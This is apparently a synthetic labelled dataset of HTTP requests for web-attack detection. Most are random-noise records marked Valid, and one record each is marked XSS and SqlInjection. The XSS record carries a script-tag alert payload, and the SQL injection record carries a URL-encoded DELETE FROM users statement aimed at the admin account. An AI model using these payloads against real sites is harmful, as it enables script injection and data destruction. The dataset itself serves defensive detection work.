UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: gacaa; 0cem2J=oant2IE
Upgrade: wfs/7.4
Warning: 136 www.scdehe.htm "ridpNhteTrlcH" 
X-Forwarded-For: 140.59.115.43
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36792
Start - Id: 15224
class: Valid
GET /oisnase/e9JM/Oz3OHZD/ofBs3infR-W.b.tiff?ah9xwopt=bh0Me1hnSlc1&sE1hJoLt0_51=7941525&uhovboi0hrr2la=dhw&toos4o=ehts3naast&Luo79=Ey&sock_stream4u_VDXSAS=tind++d8wld&HUhesl=srw&xioeoa=88947&eTuns=ezfDKbrx&nqniz=91260661 HTTP/1.0
Host: www.henIu1fcze.uk:578
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: tE7nG=zqold
Client-ip: 169.143.137.176
Cookie: eju=processing-instructionch<e nli;fta8bawi=hlien;LOCSxl16=apZqpRz9;uuierbm=oujei5eewc2x
Cookie2: $Version="7"
Date: Fri, 09 Sep 05 03:14:08 GMT
ETag: W/"LIfZMD.PKLl@iFwdQEW"
Expect: edHrs=Alssa
From: Ono9sk1@8ieegshia.com
If-Modified-Since: Sat, 31 Dec 05 22:12:46 GMT
If-Unmodified-Since: Mon, 25 Jun 07 13:34:47 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Mar 06 09:10:40 GMT
Max-Forwards: 6
MIME-Version: 9.5
Pragma: lecrti='nhsncia3'
Proxy-Authorization: NTLM aHRrdU5ldGh0VWF3ZWl0SGdjcnlmckRhZTdnZnRFMzFrb2R5YWxlT3JnZQ==
Authorization: Basic bXRyOXhkOmZyaWV1TGFi
Range: 8-,6457-,15780-
Referer: /haicn/ihfsi/odlt/ssntcnfl.mpeg
TE: trailers,gzip,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: 4nrCl0yO http://www.t2d4.it
UA-CPU: StrongARM
UA-Disp: 450,4767,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1443x630
Via: gcedt/6.8 www.rrsO.png:5862, FTP/1.3 www.neL7.html
Transfer-Encoding: identity
Upgrade: sua0/7.7, pt9do4/4.0
Warning: 360 www.leool.css:1 "al7ssseOeirssona" 
X-Forwarded-For: 246.111.80.235
X-Serial-Number: 985452
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15224
Start - Id: 33021
class: Valid
POST /lVs70LXwMDQO_F/rq.LK68oeobL5H.css? HTTP/1.1
Content-Length: 65
Content-Language: dt
Content-Encoding: deflate
Content-Location: /faoe.png
Content-MD5: c3VzNDlhb3FyY3R0cjBrbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 07:37:03 UTC
Last-Modified: Thu, 28 May 09 21:25:46 UTC
Host: 199.14.237.0:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: bfosvie-gsrihh, d-ebchhsea;q=0.4, 0lhtz-Clc;q=0.6, ov-f, ep-dnt
Cache-Control: min-fresh=83442
Client-ip: 36.212.245.152
Cookie: mtllgejro=0663;en8dubxsn=ala(c;th=OVn5i2emtsnN3srt;2oedrdhw4e=06;3jcmdXQwSFJP=nda|aettmpmocha@tcmd5ton
Cookie2: $Version="56"
Date: Sun, 25 Dec 05 14:21:00 GMT
ETag: W/"rHnwjd4MwLBr-ZVI2"
Expect: 100-continue
From: ehaaCtxw@5artje7.it
If-Modified-Since: Mon, 23 Nov 09 09:04:16 CET
If-Unmodified-Since: Sat, 16 Jan 10 19:32:20 UTC
If-Match: *
If-None-Match: *
If-Range: "JgEfX7pCK3UeZLQQd"
Max-Forwards: 086
MIME-Version: 0.6
Pragma: heh377='ie3b'
Proxy-Authorization: Basic YmRDcWFlOmVnZWQ0bmU=
Authorization: NTLM MHlTZHRwczNzaTByb2NjaFd0d2ljYXc2eGN0aWFpbnRkbQ==
Range: -653509,070-
Referer: http://muaHt.cz/estW2c/rHlds/o3slh/ao5gew.wav
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.5 (X11; U; Open BSD i586 8.1; ro-ea; rv:4.6.0) Gecko/11331858
UA-CPU: x86
UA-Disp: 4878,467,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 699x4175
Via: 6.3 www.hene.jpg, 0.5 www.ioz8.tiff
Transfer-Encoding: hinat; 1cestiwy=tssvcT
Upgrade: nlefj/7.3, ano/0.9
Warning: 229 3.87.67.188:155 "rolabuAsnlbse" "Mon, 12 Sep 05 12:07:12 GMT"
X-Forwarded-For: 101.97.72.137
X-Serial-Number: 131925
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6wp-optRhtacces=tc_&RjhItz5Nsdr=3667365&neaIkibd5nPe=ai&3iQn=eita

End - Id: 33021
Start - Id: 19743
class: Valid
GET /xbSYrmbaVr@9.Na/cACGeBcxKDU8_.r/ehkdmdozAispoo/nyy/eDebeglssh66ldtas/atexnw/ya_6.MkBg/oFKDbfsU4fwiQoiVR/yo/kVJYRQDx7Nv__fsxCrHh.png?drextfst66n=ee87irCusdI HTTP/1.0
Host: www.Meao4.ch
Connection: keep-alive
Accept: application/*, image/*;q=0.0, image/*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 207.179.57.163
Cookie: esors92ee=Ea0a;tt=46;0jenvendttt=yumtazwaU;tastbihTcb=rcagbi5dwehf
Cookie2: $Version="14"
Date: Mon, 10 Nov 08 06:07:15 GMT
ETag: "MpA374tHGJvwNKPP"
Expect: Taqnt
From: iuIqi35@sebqclrtn.be
If-Modified-Since: Sat, 23 Jul 05 12:53:15 UTC
If-Unmodified-Since: Thu, 21 Feb 08 02:28:59 UTC
If-Match: "sp8U@MuChLi3ZmWy@6"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM bHRIaXRocnN1YTZpczlEc2FpZWlhOW5hOXROdmNQb250cmhp
Authorization: bshT1 622Ht=ysarmk
Range: 4774-
Referer: /Rptth/msYlrerr/eueHtrp7/daasoeeo/itflfy.doc
TE: trailers,chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.4 (X11; U; Linux i386 5.9; dt-6n; rv:9.2.0) Gecko/50157948
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3293x4610
Via: pu2v5h/2.5 www.lr6en.js:398, 2.2 www.eiosc.css, ixse/3.0 www.deeR.png
Transfer-Encoding: identity
Upgrade: no0E/0.8, 0wmAl/6.4, eee/7.7, 81t/9.2
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19743
Start - Id: 30161
class: Valid
GET /lwluJBDxGaixRbm/fgPs3y.PDQubeboO_/RFejworecpen/eLhEYgYP6zH/iACp5OrinXl/rc/3IR.png?smdoTgeta=nsrdvDmeb&tDliraruTmnsS=70419132&baon=mldho+igrlboot.iniaECalpmailr%5C&jUe@=lnsasuhdalleen&7tsmHue=2&vlatfsfCeTwt=wrdropsmarlehtaccesusr&5TrrndeelH=qtstdinB&emn7e=4positions7snoots%3Er&t4ct8JiHs=mzq2sdirr4f9lae&ieirAega5plK=787800708&aZ@x=cEnf%3D9irn6&lrxnEh=9&oooxReeoo=radt&oleladwie=%5B5update4ts7%3Dd2tpy HTTP/1.0
Host: 64.98.129.41
Connection: aTicvuoo
Accept: application/*, video/*
Accept-Charset: cp-932;q=0.9, koi8-r;q=0.8
Accept-Encoding: identity;q=0.7, compress, identity
Accept-Language: tensw-gts;q=0.3, srMac-7huhno4;q=0.3, o-Escds;q=0.3
Cache-Control: min-fresh=83
Client-ip: 70.123.209.51
Cookie: cpre=uniontaepr;sienrDosn0st=9;ohAighoivsstlI=het~eptahe
Cookie2: $Version="0"
Date: Sun, 09 Dec 07 02:52:01 GMT
ETag: W/"pr0i4i.LL-1_lA2GuCkx"
Expect: 100-continue
From: 80Caae@8aha8wehtn.de
If-Modified-Since: Fri, 14 Dec 07 09:13:46 UTC
If-Unmodified-Since: Sat, 12 Aug 06 14:03:15 UTC
If-Match: *
If-None-Match: *
If-Range: "3OoicjSUt7sXG6KGEd"
Max-Forwards: 07
MIME-Version: 6.5
Pragma: ee=rNne
Proxy-Authorization: slbpn eind6Lo=5hwar
Authorization: NTLM amNORGFsaXREbmUzaWVjcTRpc3JubWFyc2liRGR0OGV1aFVpZUVoRzBVRWViZQ==
Range: -34133,03222-,1414-
Referer: /ertiSeti/5wnu/orsto76/ftEl0.pl
TE: gzip,gzip
Trailer: Upgrade
User-Agent: Mozilla/0.5 (Windows; U; WinNT 6.8; aI-Tb; rv:0.1.7) Gecko/19919476
UA-CPU: Sparc
UA-Disp: 9773,678,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 488x0113
Via: 3.2 www.oAuoti.gif, 1.4 www.hetcmr.jpg:01, 9.0 www.jdsr.jpeg
Transfer-Encoding: compress
Upgrade: lk6a5e/0.8, Agoqga/0.6, lnr6p/2.4, wsi/3.9
Warning: 169 145.87.255.238 "bhcawmncs4" "Fri, 12 Jan 07 03:02:59 UTC"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 1268893024649489641
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30161
Start - Id: 22705
class: Valid
GET /rcDMrxorpo1pelahio.html?iEua9rmtieln=9507&m2s=5+e&avmpctsoisdag=lTKw&ctteor1La=anfo0deiniEskne&getlrtqtintape=NdCht&rE=80525&xp_M-l=rTmst9rmegZsobt HTTP/1.1
Host: 92.88.116.124
Connection: ccgi
Accept: */*
Accept-Charset: x-mac-icelandic
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 24.173.40.220
Cookie: zpO=nhr;ee5dlacifeeitu=elqeA<avbscriptotmo Masri
Cookie2: $Version="4"
Date: Wed, 03 Oct 07 17:26:39 GMT
ETag: W/"XUHbUD3CedbGOUJ@"
Expect: 100-continue
From: fwue@n7oczlrtbi.it
If-Modified-Since: Fri, 25 Sep 09 11:37:56 CET
If-Unmodified-Since: Sun, 08 Nov 09 17:40:39 GMT
If-Match: *
If-None-Match: *
If-Range: "Y8DIyk223FWkigoH"
Max-Forwards: 3437
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic bmNlYlRhaGE6aGlzZG5uTg==
Range: -0811
Referer: /o8ce/luanar/iian/hlu6Vo/g85dt.ace
TE: chunked,trailers
Trailer: Connection
User-Agent: moaeddL/7.5.7.1
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0084x738
Via: etp/1.4 www.yuemle.png, HTTP/8.3 www.dP0irwn.jpeg
Transfer-Encoding: deflate
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 346 224.131.21.168 "uaifemiio3r" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22705
Start - Id: 33705
class: Valid
PUT /iesetfbhh/EscriptPUNAU9divGOps.f4/l9a5.shtml? HTTP/1.0
Content-Length: 260
Content-Language: naimietr,osiwj,e
Content-Encoding: deflate
Content-Location: /tdnm5Eh/nOosslrt.dll
Content-MD5: aTRpdXNkM2xuZ3NpZHNxOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Jan 04 24:46:20 CET
Last-Modified: Mon, 12 Jan 04 18:33:59 UTC
Host: www.n2cn.org
Connection: close
Accept: text/*;q=0.3
Accept-Charset: iso-8859-3
Accept-Encoding: identity, identity, deflate;q=0.5, compress;q=0.2
Accept-Language: mg7-23I, cias-aBbN;q=0.2, caaee-id4;q=0.2, 3s7ulbmt-qatl;q=0.3
Cache-Control: no-store
Client-ip: 103.32.75.163
Cookie: ohenpudkm=9bgsound3o
Cookie2: $Version="27"
Date: Thu, 07 Apr 05 03:37:11 CET
ETag: W/"OuCB_nSlEjkR3sVs"
Expect: sH8rERr=7aNeEfre
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Thu, 25 May 06 07:26:59 CET
If-Unmodified-Since: Fri, 16 Jun 06 17:12:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 4.6
Pragma: s5io=d
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM dGF3b2E4cEVuZW9FdGVSaEFSRG5ldGNtd25UbjZlZXJhdHJld3NyMDZl
Range: -803,-861752
Referer: http://niwDt.de/one4qnn/sbtti/nai6/jtnreoe5.pdf
TE: deflate;q=0.5,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 5.7; qe-nh; rv:7.8.8) Gecko/62928622
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 603x625
Via: FTP/6.4 54.166.4.201
Transfer-Encoding: deflate
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 235 108.148.231.217 "91iYeeeor3" 
X-Forwarded-For: 160.35.127.98
X-Serial-Number: 695598853636
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

jteb7sx=y/&ttenjur2diare=xtnd] pqe2Esbetween &Npdaiec2v98rn=6&yui0ied=aNf&aqXn=priaccess_logttia&eanswe=Sryr9spii&aseot=tretqtoEg&oEehaogTUely=82&edietnrtt=t0n&dYo4rerlaHgn=43424&tuce=3860&lt9rnoleo=hG@&dlaLmfzzn=da&gquoieTron53oed=463457814&0nrlai=pv<

End - Id: 33705
Start - Id: 28131
class: Valid
GET /eDB1y74HeIZicMpK@tkj/sWe3/Txsos/vEIPcyk5WtI5W2/sOqQeN-m2nlRQ/umyaadlsh1/truonn/7F_/iJqQtchildGtIz-YPHV/5ao/ucast/zarJTperl1kaX.jpg?5qYcSN9h-M=24302&6fns=tEtyt&agRqm1allg4.Z6=hitmY2o&Eren=%3AaEoewwgetsowseoE&wkgs=oshoi7ti&FT2mis=nIlas&cq@execJ=dLBlFx HTTP/1.1
Host: www.Fcrzivf.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.0, iso-8859-8, iso-2022-kr
Accept-Encoding: 
Accept-Language: tc-Gfr9dNs, 8hgdge-Tpl8r;q=0.1, ewor-la;q=0.4, di3sr6r-D;q=0.3
Cache-Control: only-if-cached
Client-ip: 183.104.243.127
Cookie: neot=e>eEhttpbodyo;qtueOc4msseean=<eubelbcc~6lRoeval~ihome
Cookie2: $Version="590"
Date: Mon, 22 Mar 04 11:40:00 UTC
ETag: W/"0MdDX5NCZc@L9oK"
Expect: 100-continue
From: EcseaglP@o4oECcb.st
If-Modified-Since: Tue, 18 Sep 07 24:59:08 UTC
If-Unmodified-Since: Sat, 10 Oct 09 03:18:14 GMT
If-Match: "AELyHX_vNF-9Off4ki"
If-None-Match: *
If-Range: "15jkWPIx22WMQP2FUzP"
Max-Forwards: 7432
MIME-Version: 2.2
Pragma: nkoLpNoh='ebNctelp'
Proxy-Authorization: Digest username="0wng"
Authorization: tpnhot mtnahma=oeisiRcR
Range: -76,-9033,4589-7
Referer: /4hrwhaea/eemomi/pI21eRdi.jpeg
TE: trailers
Trailer: Warning
User-Agent: hNvHXSv http://www.1cvhe.gov
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4261x691
Via: eur/2.8 171.92.223.122, 3.4 www.3Etson.html
Transfer-Encoding: gzip
Upgrade: oItf/8.6, mhoe/0.7, site7t/5.3, roNirm/8.5, mhoe1e/8.4
Warning: 821 169.183.205.45 "uorwsi4qi" "Sun, 12 Mar 06 21:00:13 UTC"
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 9260606100019
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28131
Start - Id: 21800
class: Valid
GET /tW/l55.Cd4fo/fOesakewzg/E1/4g86d/pxsTH8ELHG5CBE4Y5O/ntRlxbiinp0/Zr/npWbWvbWif4hW/peaol.shtml?rti=hX8yA7V7rQJ&weLC3mno2lU=kpasswdl&ItPDC3LOGin=egocZ1FMIIg5&mwH19t=H%29nebnjzp7al%3Dmb&StViee=a%2Blcat%40&wqu=nYMS0ubX7 HTTP/1.1
Host: www.A7RB.com
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-korean, x-mac-arabic;q=0.4, windows-1258;q=0.3, x-mac-korean
Accept-Encoding: 
Accept-Language: 1mj8sfOE-uk, Gf-tse
Cache-Control: max-age=5
Client-ip: 219.163.45.202
Cookie: Itb=t3&ahwem F bo6a;7ct=9881092
Cookie2: $Version="7"
Date: Thu, 06 May 04 02:11:24 GMT
ETag: "L5HhIZwc6obWrDxB"
Expect: 100-continue
From: qn7fi@stAorh.org
If-Modified-Since: Fri, 16 Dec 05 08:22:13 UTC
If-Unmodified-Since: Sun, 19 Nov 06 22:03:57 GMT
If-Match: "7cf_IdTVbCJSE284A"
If-None-Match: *
If-Range: *
Max-Forwards: 4412
MIME-Version: 6.7
Pragma: 8e=eujet
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: hqtl tth8p=pmsdc
Range: 4-0585,7-
Referer: http://www.ObPat.ch/2v8ite/flbufg.htm
TE: chunked
Trailer: Max-Forwards
User-Agent: o4Fte (mxpkL8M_oT; 4a5jJ7h; ln6CcJ.; n0Lq_ReGxG; mXzTzrz)
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5280x218
Via: 0.8 11.126.27.101
Transfer-Encoding: ebobG
Upgrade: lmt3e/5.6, eogjeo/0.1
Warning: 281 www.mehu.png:9321 "ryoermnI0lwry" "Sun, 27 Nov 05 22:05:35 CET"
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 8436166703567420278
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21800
Start - Id: 1707
class: Valid
GET /mafn1cpoGkEjzkCuTQhK/pTisagenheaoeu/dZP7lp/oracerrfwHhmneodinj/kRPUJYy/rQlP/i9-epFthlHM/mlaitaduorjgols/mWHKSit9RN3jrjPumjt/tFD_fv24d0V7Y.msf?@XuJGcCp=tgpa7&sg816ervshro=sohspntpwmt HTTP/1.0
Host: 103.94.126.219
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=26
Client-ip: 125.202.6.4
Cookie: divmeta1VWRD7=ie ne;clLI-q4-hl=328015;rwlcmsLdrwz=14;E5TphMxautoexecO=window.openc;rOmedyc9y8pn0=winnthHtm6group bymmt|;7
Cookie2: $Version="8"
Date: Thu, 09 Mar 06 11:31:59 UTC
ETag: W/"4lEHHnaJF0Qi.wXSW"
Expect: rcieAm5l
From: pa7hs@flEnsebniq.be
If-Modified-Since: Sat, 10 Sep 05 24:16:07 GMT
If-Unmodified-Since: Mon, 08 Jan 07 10:23:50 GMT
If-Match: *
If-None-Match: "gmcBhRnz8ogvyJ28@Gjl"
If-Range: "JCofTTam8effiFmWjbR"
Max-Forwards: 764
MIME-Version: 0.3
Pragma: ra='to9'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZmZ0dG1lam13YWluYXVydElpZXJzeG9vc1JpdGh0TnJva1BidGVwbmU=
Range: 73-
Referer: http://www.Etrps.uk/elkims6/1n8b/hej2co/re4xDEx.png
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: Mozilla/5.5 (compatible; Konqueror/6.1; Solaris; hrtwd)
UA-CPU: StrongARM
UA-Disp: 6638,4343,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3865x207
Via: 3.4 62.16.153.123
Transfer-Encoding: identity
Upgrade: eba/9.5, rtti/0.6, Saos/3.8
Warning: 172 www.poy0Rt8.tiff "fikd" "Wed, 05 Aug 09 17:49:17 UTC"
X-Forwarded-For: 53.157.224.180
X-Serial-Number: 3355979393710804862
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1707
Start - Id: 46822
class: XSS
PUT /tiewdwB9ivVFk9/adPBFw_/dsTv0Qw/obInHld8HBf/Ropsz/biAEssuoeoyTaBiTzeN/tanaeptncluur0oY6msg/zhyEith/Ia0fnNueoEt4uoorv/GbJ/lqugesnesnia8.js? HTTP/1.0
Content-Length: 128
Content-Language: 2svt50ml,isdlde
Content-Encoding: compress
Content-Location: /s5d9ey/sned7.pdf
Content-MD5: ckE3b2xpZW1hdG1pZXJtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Apr 09 15:36:40 UTC
Last-Modified: Sat, 15 Dec 07 21:22:41 UTC
Host: 59.2.49.105
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.9, windows-1252;q=0.2, utf-8;q=0.5, hz-gb-2312
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=2021
Client-ip: 20.57.50.84
Cookie: leatexoa0sGeaz=bdrhh0t9n;t6C=7
Cookie2: $Version="9"
Date: Sat, 03 Jul 04 10:07:06 UTC
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Sun, 04 Jan 09 23:33:17 GMT
If-Unmodified-Since: Thu, 25 Sep 08 15:20:57 CET
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: "@N9JHMx_V1eF7763QvqK"
Max-Forwards: 20
MIME-Version: 8.3
Pragma: twimeth='dso'
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZVVyZTYwaWZzM2VlaW9ycm1IZm5zZW90bTRDaHMyaDd1
Range: 0-
Referer: http://eosrnzse.org/dsNp7m/lAto1/nlmbc/sq98.asmx
TE: trailers,gzip;q=0.3,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 0.6; te-cB; rv:6.3.0) Gecko/72388823
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.1 26.106.2.244, 4.5 www.h3zycsns.html, 7.9 www.nyial4m.html
Transfer-Encoding: deflate
Upgrade: dmhn/6.6, j0orh/4.6
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fSesaialdceh=<![CDATA[<!--]]  ><script  >[alert  ('beoebIu');]//--></script    >

End - Id: 46822
Start - Id: 41657
class: SqlInjection
GET /grayopiaMoc/iQ/iIl/f5te6rojrCaolblhmqh/swLcWI14FP/aektAhn9lh3p.php4?dtxbTanNs7oieF=aEgbw&cd1i.=ssm6n5zs&B1BQ=56303&l2aoVeTjt3woo2t=7948506271&uAdetr=14461&ijlac=131&ect=25903&alrecri=nm%3B0nullEs8i&G@FvarZOwindow.openC=2rnmrsm1Yo&heudotoodncap=65653&grz=o6hastea9%27%29%3B+++++DEL%2F**%2FETE++++FROM++++users++++WHERE++upper%28username%29+%3D+upper%28%27admin&axsiy=a+d&sb6e9h=15087&Y6wHsfY9A8no=68 HTTP/1.1
Host: 2.171.77.32
Connection: O9xtuhrp
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 70.252.115.133
Cookie: z_36E4Q=irl~oeiu0o]htfxr phpp;tp=8027
Cookie2: $Version="72"
Date: Mon, 11 Jul 05 19:58:27 UTC
ETag: W/"tK08tBHPggtEMtZ1I-o"
Expect: tdqm
From: oseas@soacs.biz
If-Modified-Since: Fri, 13 May 05 09:37:10 GMT
If-Unmodified-Since: Wed, 12 May 04 12:28:51 GMT
If-Match: *
If-None-Match: *
If-Range: "kUR6PynGPM1Y0p4Tg"
Max-Forwards: 610
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: ebDoe1 e2o6goee=Atbb0aec
Range: 0-,-4,4860-288700
Referer: http://jtqb.uk/elsf/itcnxLp/jOztl/6Zuars.cgi
TE: trailers,gzip;q=0.6,trailers
Trailer: If-Range
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 1.9; dr-o6; rv:5.8.1) Gecko/76926016
UA-CPU: MIPS
UA-Disp: 627,8726,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/0.4 www.stgRwi5.png:3938, FTP/8.8 218.220.4.225:8135, FTP/0.0 183.219.30.169
Transfer-Encoding: compress
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 553 www.mekn.jpg "dieiIfit2dki8e" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41657
Start - Id: 1624
class: Valid
GET /seyuRbo04tuseea5mr/monOtoEEhangqi4duzl/ts3malor00ywtwe/eorIc/yw_EgueeeEBWVCaZfka/n55ApHkmba0/ttwyereoeEi50ber.asp?tn7ait5=radminW5dhtaccestobject%28jxpi3de19&zlX4irioisect=ihord%3Aa8w1&6nsovuikT=7 HTTP/1.1
Host: www.terut.ch:954
Connection: Iaein
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: al-i;q=0.3
Cache-Control: nmgevv='oxug'
Client-ip: 145.27.235.103
Cookie: oszCrnTte=d20Obwf3w;3arih=n?ctelnetz;hntmoTm=1onn;tohho2ceo=R%
Cookie2: $Version="28"
Date: Sun, 20 Jul 08 08:34:28 GMT
ETag: W/"pO0lK@jqcj14w.4bLIs"
Expect: i66Tr
From: S6tD@nser.com
If-Modified-Since: Tue, 09 Oct 07 14:11:59 UTC
If-Unmodified-Since: Tue, 04 Sep 07 05:03:30 UTC
If-Match: *
If-None-Match: "dx6pClckYyEfO3a5RSW"
If-Range: "HOrT3SlqySbmdgFxbQ"
Max-Forwards: 761
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: i2vGen celiyy=ey4ea
Authorization: Digest nc=5982Ee8f
Range: -60187,7-
Referer: http://rlrH.be/rrlh/urcd/RcE2wErn.mp3
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: rtuebnN (02rTThEs17; ik73G4OW1; a@Dc_N4j; iSSsnew.; yWQyF-A)
UA-CPU: MIPS
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7605x6639
Via: 5.4 www.3J2eeai.shtml, FTP/8.5 www.wwultehO.css, fohese/0.8 www.ee6haaq.jpg:989
Transfer-Encoding: mqwvX; dn9ernsA=RaErx
Upgrade: ecl/4.8, rwegte/0.2, hr1m/6.0, yeanc/4.6
Warning: 318 222.19.53.234 "sstiGcacDpasfNn7n" 
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1624
Start - Id: 22865
class: Valid
GET /0rU/ijOQEhhjCTV/rzJ.ii5rg1P/iqrtarue62Rlecmrtsog/Ddo3srTgmunmeada7i/GbA3mJl3h4f-Q/05/htrpe2ggFGoha7se6/xp_8CBobject/seewmt.htm?lwapt=eiPmeSnrbhsnra&bn1j2Inrh9ior=eoDO8dhlaincludei0document HTTP/1.0
Host: 215.184.230.222
Connection: AtTr
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: easm-tial;q=0.4, uin-cf3ei, lw-anel;q=0.5
Cache-Control: min-fresh=7407
Client-ip: 76.193.28.123
Cookie: ra87t=r0Zs3ar0tteimo;c6eoe=86;SorbinVk-2km500=uIP@85El8a;Eape=87998706;Xcopy.VGxr=ers9oo
Cookie2: $Version="7"
Date: Wed, 16 Feb 05 04:33:22 UTC
ETag: W/"Vml4Ut5XHUx9JQSUCTb"
Expect: 100-continue
From: tooo@iHal.net
If-Modified-Since: Mon, 19 Apr 10 09:37:56 CET
If-Unmodified-Since: Sat, 24 Jul 04 04:54:48 GMT
If-Match: *
If-None-Match: *
If-Range: "XjmSqzgTvXHTS_Y4I"
Max-Forwards: 2
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic Y3dzdG1sOm5zb2Rp
Authorization: NTLM NHNubHJ0YTBtcjlzeXMzbm5hYXlvYWxrb3Nzc0NkbW0=
Range: 7-
Referer: http://g1ors.de/icoUSe.php4
TE: deflate;q=0.2,trailers
Trailer: Via
User-Agent: Mozilla/8.5 (X11; U; Unix 8.3; vx-Tt; rv:4.6.4) Gecko/82394516
UA-CPU: StrongARM
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 134x6878
